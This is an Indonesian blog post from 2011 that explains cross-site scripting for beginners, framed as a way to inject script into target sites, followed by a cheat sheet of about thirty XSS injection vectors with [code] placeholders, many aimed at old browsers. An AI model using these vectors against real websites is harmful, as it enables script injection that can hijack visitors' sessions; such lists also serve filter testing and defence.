Jumat, 21 Januari 2011

xss adalah?

XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client . XSS merupakan pilihan yang menarik bagi para newbie yang tidak mempunyai shell dan sploit ,karena untuk melakukan xss hanya di butuhkan sebuah browser. Ingat XSS adalah hanya memasukan script kedalam url site target . Ada perbedaan antara XSS dengan Script injetion . Xss hasilnya hanya bisa diliat secara temporary beda dengan script injection yang full merubahnya sama seperti kita mendapatkan root dan merubah halaman index nya.

*Script yang bisa digunakan untuk XSS adalah
-> HTML
-> JavaScript
-> VBScript
-> Active X
-> Flash

ada banyak script yg biasa digunakan contohnya :
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]


Sumber : echo.or.id

Tidak ada komentar:

Posting Komentar